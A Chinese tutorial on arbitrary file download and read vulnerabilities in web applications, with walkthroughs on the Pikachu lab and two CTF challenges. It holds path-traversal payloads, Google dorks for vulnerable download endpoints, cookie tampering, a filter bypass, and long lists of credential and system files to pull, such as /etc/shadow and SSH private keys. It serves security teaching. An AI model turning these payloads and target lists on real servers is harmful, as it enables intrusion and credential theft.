欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

案例讲解WEB 漏洞-文件操作之文件下载读取

程序员文章站 2022-06-19 17:25:53
目录linuxgoogle searchroarctf2019-文件读取真题复现百度杯2017二月-zone真题复现原理产生:任意语言代码下载函数文件下载(一些网站由于业务需求,往往需要提供文件查看或...

原理

产生:任意语言代码下载函数
文件下载(一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞。)

文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。
所以,在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。

漏洞危害

下载服务器任意文件,如脚本代码、服务及系统配置文件等
可用得到的代码进一步代码审计,得到更多可利用漏洞

利用方式

浅谈任意文件下载漏洞的利用
信息收集信息→猜路径→下载配置文件/代码文件→利用服务器软件漏洞→shell→提权

首先收集系统信息,包括系统版本,中间件,cms版本,服务器用途,服务器使用者信息,端口,web路径等,然后根据收集到的信息,下载配置文件,如weblogic,ftp,ssh等, 根据下载到的配置文件进行渗透。

1. 读取程序源代码(如密码配置文件)
2. 读取程序配置文件(如数据库连接文件)
如weblogic,ssh,ftp,数据库配置文件等, 当解出密码后,进行登陆,getshell
3. 读取操作系统关键文件(如/etc/sadow,/ root/.bash_history等文件)
4. 读取运维配置文件(redis/rsync/ftp/ssh客 户端数据等)
5. 读取中间件配置文件(weblogic/tomcat等 密码文件,apache的httpd.conf文件)
6. 下载web日志文件(获取网站后台/上传文件 等)
 下载日志文件,找到登录/上传/后台/ 操作,找到登录入口 可以爆破,测试默认口令,弱口令,  找到文件上传点则测试文件上传漏洞,找到后台操作试试有没有未授权访问
7. 结合ssrf获取内网机器文件
8. 可以利用../返回到上级目录下载敏感文件

系统文件

window

c:\boot.ini //查看系统版本
c:\windows\system32\inetsrv\metabase. xml //iis配置文件
c:\windows\repair\sam //存储系统初次安装的密码
c:\program files\mysql\my.ini //mysql配置
c:\program files\mysql\data\mysql\user. myd  //mysql root
c:\windows\php.ini //php配置信息
c:\windows\my.ini //mysql配置信息

linux

.bash_history` # 历史中可能带着用户的密码 ( 遇到过现实案例,是输错的情况下参数的,比如没 输入 su 却以为自己输了 su)
/etc/passwd # 用户情况
/etc/shadow # 直接 john the ripper
/etc/hosts # 主机信息,通常配置了一些内网 域名
/root/.bash_history //root的bash历史记录
/root/.ssh/authorized_keys /root/.mysql_history //mysql的bash历史记录
/root/.wget-hsts /opt/nginx/conf/nginx.conf //nginx的配置文件
/var/www/html/index.html /etc/my.cnf /etc/httpd/conf/httpd.conf //httpd的配置文件
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts /porc/config.gz /proc/sched_debug // 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用
/proc/mounts // 挂载的文件系统列表
/proc/net/arp //arp表,可以获得内网其他机器的地址
/proc/net/route //路由表信息
/proc/net/tcp and /proc/net/udp // 活动连接的信息
/proc/net/fib_trie // 路由缓存
/proc/version // 内核版本
/proc/[pid]/cmdline // 可能包含有用的路径信息
/proc/[pid]/environ // 程序运行的环境变量信息,可以用来包含getshell
/proc/[pid]/cwd // 当前进程的工作目录
/proc/[pid]/fd/[#] // 访问file descriptors, 某写情况可以读取到进程正在使用的文件,比如 access.log /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys /etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/syscomfig/network-scripts/ifcfg-eth1
/usr/local/tomcat/conf/tomcat-users. xml # tomcat 用户配置文件
/root/.bashrc # 环境变量
/root/.bash_history # 还有root外的其他用户
/root/.viminfo # vim 信息
/root/.ssh/id_rsa # 拿私钥直接ssh
/proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为0000-9999 使用burpsuite 数据库 config 文件     web 日志 access.log, error.log /var/lib/php/sess_phpsessid # 非常规问题 session 文件
/proc/net/arp /proc/net/tcp /proc/net/udp /proc/net/dev

常见脚本敏感文件参考

php: inc/config. php获得数据库连接字符串中的口令信息
asp: inc/conn.asp文件,获得数据库连接字符串,得到数据库口令。
aspx: web.config网站根目录文件,获得数据库连接信息。
jsp: conf/ tomcat-user.xml文件,获得tomcat管理界面的口令信息
web- inf /web. xml文件,获得数据库连接字符串中的口令信息。

任意文件读取

<?php
    $filename = "test.txt";
    readfile($filename);
?>

<?php
    $filename = "test.txt";
    $fp = fopen($filename,"r") or die("unable to open file!");
    $data = fread($fp,filesize($filename));
    fclose($fp);
    echo $data;
?>

<?php
    $filename = "test.txt";
    echo file_get_contents($filename);
?>

任意文件下载

直接下载:

<a href="http://www.xx.com/a.zip" rel="external nofollow" >download</a>

用header()下载:

<?php
    $filename = "uploads/201607141437284653.jpg";
    header('content-type: imgage/jpeg');
    header('content-disposition: attachment; filename='.$filename);
    header('content-lengh: '.filesize($filename));
?>

google search

inurl:"readfile.php?file="
inurl:"read.php?filename="
inurl:"download.php?file="
inurl:"down.php?file="
等等...

漏洞利用代码

readfile.php?file=/etc/passwd
readfile.php?file=../../../../../../../../etc/passwd
readfile.php?file=../../../../../../../../etc/passwd%00

1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件读取漏洞
3.提示文件下载,则是文件下载漏洞

漏洞挖掘

可以用google hacking或web漏洞扫描器
从链接上看,形如:
    • readfile.php?file=***.txt
    • download.php?file=***.rar
从参数名看,形如:
    • &realpath= 
    • &filepath= 
    • &filepath= 
    • &path= 
    • &path= 
    • &inputfile= 
    • &url= 
    • &urls= 
    • &lang= 
    • &dis= 
    • &data= 
    • &readfile= 
    • &filep= 
    • &src= 
    • &menu= 
    • meta-inf 
    • web-inf
目录符号等
../ ..\ .\ ./等
%00 ? %23 %20 .等

漏洞验证

• index.php?f=../../../../../../etc/passwd 
• index.php?f=../index.php 
• index.php?f=file:///etc/passwd
注:当参数f的参数值为php文件时,若是文件被解析则是文件包含漏洞,
    若显示源码或提示下载则是文件查看与下载漏洞

漏洞防范

任意文件下载漏洞的简单防护措施
1、过滤“.”符号,使用户在url中无法回溯到上级目录。
2、使用正则表达式严格判断用户输入参数的格式。
3、php.ini配置文件中对于open_basedir进行配置,限定用户的文件访问范围。
4、固定目录

案例

pikuchu靶场-文件下载测试

1、判断是否为文件上传漏洞

案例讲解WEB 漏洞-文件操作之文件下载读取

点击任意图片,发现下载了图片,复制图片下载链接查看

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=kb.png

查看参数名为filename,查看参数后面的值也与下载的文件名一样
初步判定为文件上传漏洞

2、判断下载路径
filename的文件名是单纯的文件名,可判断是前面加了路径名,也可能是与网站在同一个目录下
通过url判断文件是通过跳转到execdownload.php页面下载的,我们试试看可不可以直接下载到execdownload.php这个源码

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=execdownload.php

案例讲解WEB 漏洞-文件操作之文件下载读取

发现显示无法下载,说明该execdownload.php与文件不在同一个路径下,我们尝试下到上一级路径

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=../execdownload.php

案例讲解WEB 漏洞-文件操作之文件下载读取

成功下载,打开源码发现是在download文件夹下

案例讲解WEB 漏洞-文件操作之文件下载读取

说明文件下载路径的文件夹与down_nba.php是同一级路径
3、尝试下载敏感文件(以下路径均通过扫描路径得到)
pikachu-master/inc/config.inc.php
当前下载路径:
pikachu-master/vul/unsafedownload/download/xxx.xxx
与vul相差3个父目录,所以加3个…/
完整url:
http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=…/…/…/inc/config.inc.php
下载成功,打开发现里面存在数据库相关的配置文件

案例讲解WEB 漏洞-文件操作之文件下载读取

小米路由器-文件读取真实测试-漏洞

复现

roarctf2019-文件读取真题复现

wp
首先看到一个页面,点击下help看看啥情况。
案例讲解WEB 漏洞-文件操作之文件下载读取

发现输出一串

java.io.filenotfoundexception:{help.docx}

是文件无法找到的异常信息

案例讲解WEB 漏洞-文件操作之文件下载读取

查询资料发现:
web-inf/web.xml泄露
web-inf是java的web应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。web-inf主要包含一下文件或目录:
/web-inf/web.xml:web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/web-inf/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/web-inf/lib/:存放web应用需要的各种jar文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/web-inf/src/:源码目录,按照包名结构放置各个java文件。
/web-inf/database.properties:数据库配置文件

漏洞成因:
通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。一般情况,jsp引擎默认都是禁止访问web-inf目录的,nginx 配合tomcat做均衡负载或集群等情况时,问题原因其实很简单,nginx不会去考虑配置其他类型引擎(nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改nginx配置文件禁止访问web-inf目录就好了: location ~ ^/web-inf/* { deny all; } 或者return 404; 或者其他!

根据上文,我们先找一下web-inf/web.xml,post传值

案例讲解WEB 漏洞-文件操作之文件下载读取

得到web-inf/web.xml文件,打开

<?xml version="1.0" encoding="utf-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/xmlschema-instance"
         xsi:schemalocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <welcome-file-list>
        <welcome-file>index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>indexcontroller</servlet-name>
        <servlet-class>com.wm.ctf.indexcontroller</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>indexcontroller</servlet-name>
        <url-pattern>/index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>logincontroller</servlet-name>
        <servlet-class>com.wm.ctf.logincontroller</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>logincontroller</servlet-name>
        <url-pattern>/login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>downloadcontroller</servlet-name>
        <servlet-class>com.wm.ctf.downloadcontroller</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>downloadcontroller</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>flagcontroller</servlet-name>
        <servlet-class>com.wm.ctf.flagcontroller</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>flagcontroller</servlet-name>
        <url-pattern>/flag</url-pattern>
    </servlet-mapping>

</web-app>

我们可以看到com.wm.flagcontroller,

    <servlet>
        <servlet-name>flagcontroller</servlet-name>
        <servlet-class>com.wm.ctf.flagcontroller</servlet-class>
    </servlet>

servlet-class里面的.代表的是路径/
然后下载flagcontroller.class文件试一试

filename=web-inf/classes/com/wm/ctf/flagcontroller.class

打开文件发现一串base编码,进行base64解密得到flag

案例讲解WEB 漏洞-文件操作之文件下载读取

案例讲解WEB 漏洞-文件操作之文件下载读取

资料1
资料2

案例讲解WEB 漏洞-文件操作之文件下载读取

百度杯2017二月-zone真题复现

靶场
wp1
wp2

案例讲解WEB 漏洞-文件操作之文件下载读取

1、 尝试burp抓包发现cookie中有个login,值为0,将0改为1后在访问首页,发现可以正常登入

案例讲解WEB 漏洞-文件操作之文件下载读取

2、单击 “manage” (此时还是需要用burp改login的值),点击框框发现比较特殊的url;猜测可能存在文件包含或者下载、读取

案例讲解WEB 漏洞-文件操作之文件下载读取

3、测试访问url: xxxxxx.com/manages/admin.php?module=ind…/ex&name=php 页面可以正常访问,猜测过滤了一遍…/再试一试绕过 url:url: xxxxxx.com/manages/admin.php?module=ind…/./ex&name=php 访问不正常;
说明过滤机制只是把…/进行了一次过滤,所以我们双写…/即可

4、访问测试任意文件读取判断路径通过不断加…/ url:?module=…/./…/./…/./etc/passwd&name
(用户情况文件)

案例讲解WEB 漏洞-文件操作之文件下载读取

5、查看下服务器是nginx。找一下它的配置文件,根据信息读取配置文件, url: manages/admin.php?module=…/./…/./…/./etc/nginx/nginx.conf 获得关键文件sites-enabled/default 并进行读取

案例讲解WEB 漏洞-文件操作之文件下载读取

module=…/./…/./…/./etc/nginx/sites-enabled/default&name=获得web文件路径online-movies 并访问

案例讲解WEB 漏洞-文件操作之文件下载读取

6、发现可以利用的漏洞,因为有一个autoindex on也就是开启了目录遍历,我们可以访问这个/online-movies/,访问出现如下,再点击…/发现要进行验证,把login改为1后页面空白,我通过百度发现要/online-movies/…才能遍历(不清楚为什么)

案例讲解WEB 漏洞-文件操作之文件下载读取

7、访问/online-movies…/

案例讲解WEB 漏洞-文件操作之文件下载读取

8、地址为:online-movies…/var/www/html/flag.php构造url下载到flag.php获得flag

到此这篇关于案例讲解web 漏洞-文件操作之文件下载读取的文章就介绍到这了,更多相关web 漏洞文件下载读取内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!